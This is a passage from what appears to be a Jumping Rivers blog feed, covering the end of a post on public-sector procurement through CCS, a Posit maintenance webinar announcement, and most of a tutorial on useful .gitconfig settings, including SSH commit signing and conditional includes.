&lt;h2 id="why-this-matters-for-public-sector-teams"&gt;Why this matters for public sector teams&lt;/h2&gt;
&lt;p&gt;If you work in the public sector, you are often balancing delivery pressure with strict procurement rules. Even when a team knows who they want to work with, the process of getting approval can slow things down.&lt;/p&gt;
&lt;p&gt;By being available through CCS, we can now be procured through an established framework that many organisations already use.&lt;/p&gt;
&lt;p&gt;This means:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Faster access to our services&lt;/li&gt;
&lt;li&gt;Less time spent on procurement paperwork&lt;/li&gt;
&lt;li&gt;Confidence that the supplier has already been vetted&lt;/li&gt;
&lt;li&gt;A clearer route to starting work&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="who-this-is-relevant-for"&gt;Who this is relevant for&lt;/h2&gt;
&lt;p&gt;This approval is particularly useful for teams across:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Local and central government&lt;/li&gt;
&lt;li&gt;Healthcare and NHS organisations&lt;/li&gt;
&lt;li&gt;Education and research institutions&lt;/li&gt;
&lt;li&gt;Other public sector bodies using CCS frameworks&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If your organisation already buys services through CCS, you can now engage us directly using that route.&lt;/p&gt;
&lt;h2 id="what-this-means-for-working-with-us"&gt;What this means for working with us&lt;/h2&gt;
&lt;p&gt;Nothing changes about how we work day-to-day. We still focus on understanding your context, your constraints, and what you actually need support with.&lt;/p&gt;
&lt;p&gt;What has changed is how easy it is to get started.&lt;/p&gt;
&lt;p&gt;If you are required to buy through CCS, this approval removes friction and shortens the path from first conversation to delivery.&lt;/p&gt;
&lt;h2 id="not-sure-where-to-start"&gt;Not sure where to start?&lt;/h2&gt;
&lt;p&gt;If you are unsure which CCS framework applies to your organisation or whether this route is right for you, we are happy to talk it through.&lt;/p&gt;
&lt;p&gt;We can help you understand:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Which framework to use&lt;/li&gt;
&lt;li&gt;Whether your organisation is eligible&lt;/li&gt;
&lt;li&gt;How to move from initial discussion to procurement&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Our goal is to make working together as straightforward as possible. If you would like to get in touch, &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;you can contact us.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/approved-dos7-crown-commercial-services/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Keeping Posit Environments Reliable in Production: Free Jumping Rivers Webinar</title><link>https://www.jumpingrivers.com/blog/posit-maintenance-support-webinar/</link><pubDate>Wed, 11 Feb 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/posit-maintenance-support-webinar/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/posit-maintenance-support-webinar/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/posit-maintenance-support-webinar/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Teams often treat software updates as something to postpone until absolutely necessary. But with analytics platforms, falling behind can introduce avoidable risk, compatibility issues, and missed improvements.&lt;/p&gt;
&lt;p&gt;On &lt;strong&gt;19 February&lt;/strong&gt;, Jumping Rivers is hosting a webinar focused on a simple question: &lt;strong&gt;why should teams keep their Posit software up to date?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The session will be led by &lt;strong&gt;Sebastian Mellor&lt;/strong&gt;, Head of Engineering at Jumping Rivers, who supports organisations running Posit tools in production environments.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs?typeform-source=www.jumpingrivers.com" rel="external"&gt;&lt;strong&gt;You can register for the webinar using this form.&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="what-youll-learn"&gt;What You’ll Learn&lt;/h2&gt;
&lt;p&gt;This session will highlight concrete examples pulled directly from recent Posit release notes.&lt;/p&gt;
&lt;p&gt;Sebastian will walk through:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What changed and why it matters&lt;/li&gt;
&lt;li&gt;How updates affect reliability, security, and performance&lt;/li&gt;
&lt;li&gt;The risks of delaying upgrades&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The goal is to give teams a clearer picture of what they gain by staying current and what can happen when updates are ignored.&lt;/p&gt;
&lt;h2 id="why-this-matters"&gt;Why This Matters&lt;/h2&gt;
&lt;p&gt;Keeping Posit software updated is not just about new features. It supports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Stability across environments&lt;/li&gt;
&lt;li&gt;Compatibility with evolving tooling&lt;/li&gt;
&lt;li&gt;Security improvements&lt;/li&gt;
&lt;li&gt;Better performance for data science teams&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Even small version gaps can compound over time, making upgrades harder and increasing operational friction.&lt;/p&gt;
&lt;h2 id="continued-learning-benefits"&gt;Continued Learning Benefits&lt;/h2&gt;
&lt;p&gt;Jumping Rivers encourages teams to stay engaged with the wider webinar series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Attend &lt;strong&gt;two webinars&lt;/strong&gt; and receive &lt;strong&gt;20% off tickets&lt;/strong&gt; to the &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;AI in Production 2026 conference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Attend &lt;strong&gt;more than two webinars&lt;/strong&gt; and receive &lt;strong&gt;20% off&lt;/strong&gt; any Jumping Rivers public training course&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="event-details"&gt;Event Details&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Date:&lt;/strong&gt; 19 February 2026&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Time:&lt;/strong&gt; 1:15 PM (UK time)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Venue:&lt;/strong&gt; Online&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs?typeform-source=www.jumpingrivers.com" rel="external"&gt;&lt;strong&gt;Register for the webinar using this form to secure your spot.&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/posit-maintenance-support-webinar/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Building a Robust .gitconfig</title><link>https://www.jumpingrivers.com/blog/recommended-gitconfig/</link><pubDate>Thu, 05 Feb 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/recommended-gitconfig/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/recommended-gitconfig/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/recommended-gitconfig/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Getting started with Git is easy (ha!), but once you&amp;rsquo;ve mastered the basics, it&amp;rsquo;s natural
for developers to start thinking about customising their git process.
Most Git settings live in the &lt;code&gt;.gitconfig&lt;/code&gt; file.
In this blog post, I&amp;rsquo;ll discuss what you should consider setting in your config file to make a more efficient development environment.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=recommended-gitconfig"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="adding-and-removing-variables"&gt;Adding and Removing Variables&lt;/h2&gt;
&lt;p&gt;You can edit your global &lt;code&gt;.gitconfig&lt;/code&gt; using any standard editor.
It should live in your home directory. If you have difficulty finding it, try&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git config --edit --global
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="standard-settings"&gt;Standard Settings&lt;/h2&gt;
&lt;p&gt;These settings are probably(?) suitable for everyone.
First, the name and email address you use when committing:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;user]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;name = Colin Gillespie&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;email = colin@jumpingrivers.com&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;At Jumping Rivers, we require the email address to match a particular pattern (@jumpingrivers.com)
when committing to the corporate repo.
This standardises our internal commit history.
However, most people require a couple of identities - see the end of this post for details.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;core]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;excludesfile = ~/.gitignore&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;editor = emacs&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;excludesfile&lt;/code&gt; setting points to a global &lt;code&gt;.gitignore&lt;/code&gt; file and allows you to exclude files regardless of the project. My global ignore file is fairly light.
It contains file names, such as &lt;code&gt;.Rhistory&lt;/code&gt;, &lt;code&gt;^tmp\\.*&lt;/code&gt;, and &lt;code&gt;\.vscode&lt;/code&gt;, that I never want to commit.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;editor&lt;/code&gt; setting determines which text editor Git opens for commit messages and interactive operations.
I still cling to Emacs, but most people probably prefer other options such as &lt;code&gt;vim&lt;/code&gt;, &lt;code&gt;nano&lt;/code&gt;, or &lt;code&gt;code --wait&lt;/code&gt; for Visual Studio Code.&lt;/p&gt;
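&lt;p&gt;As a rough sketch, assuming Visual Studio Code is installed and its &lt;code&gt;code&lt;/code&gt; launcher is on your &lt;code&gt;PATH&lt;/code&gt;, the equivalent entry might look like the fragment below.
The &lt;code&gt;--wait&lt;/code&gt; flag makes Git wait until you close the editor tab before it reads the commit message.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;[core]
    # Assumes the `code` command-line launcher is available on your PATH
    editor = code --wait
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;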
&lt;p&gt;Enabling &lt;a href="https://git-scm.com/book/en/v2/Customizing-Git-Git-Configuration#_colors_in_git" rel="external"&gt;colour output&lt;/a&gt; makes Git&amp;rsquo;s terminal output more readable.
Different elements (additions, deletions, branch names, etc.) are highlighted in different colours, making it easier to scan and understand what&amp;rsquo;s happening at a glance.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;color]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;ui = 1&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Almost all of the repositories I deal with use &lt;code&gt;main&lt;/code&gt; for their default branch.
This can be set via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;init]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;defaultBranch = main&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Setting &lt;code&gt;pull.rebase = true&lt;/code&gt; makes &lt;code&gt;git pull&lt;/code&gt; rebase your local commits on top of the upstream changes rather than creating merge commits, resulting in a &lt;a href="https://www.atlassian.com/git/tutorials/merging-vs-rebasing" rel="external"&gt;cleaner history&lt;/a&gt; - but can be very annoying!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;pull]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;rebase = true&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;autoSetupRemote = true&lt;/code&gt; setting automatically sets up remote tracking when you push a &lt;a href="https://jvns.ca/blog/2024/02/16/popular-git-config-options/" rel="external"&gt;new branch&lt;/a&gt;, eliminating the need for &lt;code&gt;git push -u origin branch-name&lt;/code&gt; drama.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;push]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;default = simple&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# This is the default in modern Git versions&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;autoSetupRemote = true&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="branch-management"&gt;Branch Management&lt;/h2&gt;
&lt;p&gt;This setting changes how Git sorts branches when you run commands like &lt;code&gt;git branch&lt;/code&gt;.
By default, Git sorts branches alphabetically - but alphabetically is rarely useful for me.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;branch]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;sort = -committerdate&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="useful-aliases"&gt;Useful Aliases&lt;/h2&gt;
&lt;p&gt;You can also define Git aliases:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;alias]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;root = rev-parse --show-toplevel&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;root&lt;/code&gt; &lt;a href="https://git-scm.com/docs/git-rev-parse" rel="external"&gt;alias&lt;/a&gt; provides quick access to the repository&amp;rsquo;s root directory - useful when you&amp;rsquo;re deep in a nested folder structure and need to reference files relative to the project root.
You can use it simply with &lt;code&gt;git root&lt;/code&gt;, which will output the absolute path to your repository&amp;rsquo;s top-level directory.&lt;/p&gt;
&lt;p&gt;I&amp;rsquo;ve also created a &lt;code&gt;zsh&lt;/code&gt; alias, &lt;code&gt;gcd&lt;/code&gt;, that does this, as I find it really handy.&lt;/p&gt;
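&lt;p&gt;Other aliases follow the same pattern: the alias name on the left, the Git subcommand and its flags on the right.
The three below are purely illustrative (the names &lt;code&gt;st&lt;/code&gt;, &lt;code&gt;last&lt;/code&gt; and &lt;code&gt;lg&lt;/code&gt; are my own choices here, not part of the configuration described in this post), so treat them as a starting point rather than a recommendation.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;[alias]
    # Hypothetical examples; pick names that suit your own workflow
    # Compact status that also shows the current branch
    st = status --short --branch
    # Show the most recent commit with a summary of changed files
    last = log -1 --stat
    # One line per commit, drawn as a graph with branch and tag names
    lg = log --oneline --graph --decorate
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With these in place, &lt;code&gt;git st&lt;/code&gt; behaves exactly like &lt;code&gt;git status --short --branch&lt;/code&gt;.&lt;/p&gt;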
&lt;h2 id="security-settings"&gt;Security Settings&lt;/h2&gt;
&lt;p&gt;This section covers the following requirements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We use ssh for checking out repositories&lt;/li&gt;
&lt;li&gt;The ssh key is stored securely and is password protected, i.e. encrypted&lt;/li&gt;
&lt;li&gt;Git commits are signed&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Over the years, I&amp;rsquo;ve tried a few different methods, but as we (Jumping Rivers) use 1Password to manage credentials,
I want to use the same system.&lt;/p&gt;
&lt;p&gt;The ssh key is stored in 1Password.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;commit]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;gpgsign = true&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;user]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;signingkey = ssh-ed25519 ABCD&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;gpg]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;format = ssh&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;gpg &amp;#34;ssh&amp;#34;]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;program = &amp;#34;/opt/1Password/op-ssh-sign&amp;#34;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Commit signing verifies that commits genuinely come from you, which is increasingly important in professional environments.
This configuration uses SSH keys rather than traditional GPG keys (note the &lt;code&gt;format = ssh&lt;/code&gt; setting).
I&amp;rsquo;ve used GPG keys in the past, and they can be tricky.&lt;/p&gt;
&lt;p&gt;The configuration integrates with 1Password&amp;rsquo;s SSH agent, allowing seamless signing without managing separate GPG keys.
When you make a commit, 1Password handles the signing process automatically.
It also means that you don&amp;rsquo;t have to constantly enter your password to decrypt your ssh key.&lt;/p&gt;
&lt;p&gt;Another feature of this set-up is that it&amp;rsquo;s much easier to have multiple ssh keys, rather than
&amp;ldquo;one key to rule them all&amp;rdquo;.&lt;/p&gt;
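&lt;p&gt;Signing is only half of the story. To check SSH signatures locally, for example with &lt;code&gt;git log --show-signature&lt;/code&gt;, Git also needs a list of keys it should trust.
A minimal sketch, assuming you keep that list in &lt;code&gt;~/.ssh/allowed_signers&lt;/code&gt; (a hypothetical location, not part of the configuration above):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;[gpg &amp;#34;ssh&amp;#34;]
    # Hypothetical path; each line of this file pairs an email address
    # with the public key that is allowed to sign for it
    allowedSignersFile = ~/.ssh/allowed_signers
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This would sit alongside the &lt;code&gt;program&lt;/code&gt; entry in the same section, so the file needs only one &lt;code&gt;[gpg &amp;#34;ssh&amp;#34;]&lt;/code&gt; block.&lt;/p&gt;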
&lt;h2 id="pack-optimisation"&gt;Pack Optimisation&lt;/h2&gt;
&lt;p&gt;This setting controls how aggressively Git compresses repository data by capping the delta chain depth used when packing objects.
A depth of 20 balances storage efficiency against the computational cost of packing and unpacking objects.
Lower values mean faster operations but larger repositories; higher values save space but slow down operations slightly.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;pack]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;depth = 20&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To be honest, this has been &amp;ldquo;stolen&amp;rdquo; from a long forgotten blog post/tweet/StackOverflow question.&lt;/p&gt;
&lt;h2 id="conditional-includes-for-workpersonal-separation"&gt;Conditional Includes for Work/Personal Separation&lt;/h2&gt;
&lt;p&gt;This, in my humble opinion, is an elegant solution for managing different Git identities.
When working in repositories under &lt;code&gt;/home/colin/jumpingrivers/&lt;/code&gt;, Git loads additional configuration from &lt;code&gt;.gitconfig-work&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;includeIf &amp;#34;gitdir:/home/colin/jumpingrivers/&amp;#34;]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;path = .gitconfig-work&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;.gitconfig-work&lt;/code&gt; file contains any new or updated variables, i.e.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[&lt;span style="color:#a5d6ff"&gt;user]&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;email = colin@jumpingrivers.com&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is perfect for using different email addresses on different projects.&lt;/p&gt;
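&lt;p&gt;The same pattern extends to a second identity.
In the sketch below, the &lt;code&gt;~/personal/&lt;/code&gt; directory and the &lt;code&gt;.gitconfig-personal&lt;/code&gt; file name are hypothetical; substitute whatever layout you actually use.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;# Hypothetical second identity for repositories under ~/personal/
[includeIf &amp;#34;gitdir:~/personal/&amp;#34;]
    # A relative path is resolved against the file containing this include
    path = .gitconfig-personal
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The trailing slash in the &lt;code&gt;gitdir:&lt;/code&gt; condition makes it match every repository beneath that directory.
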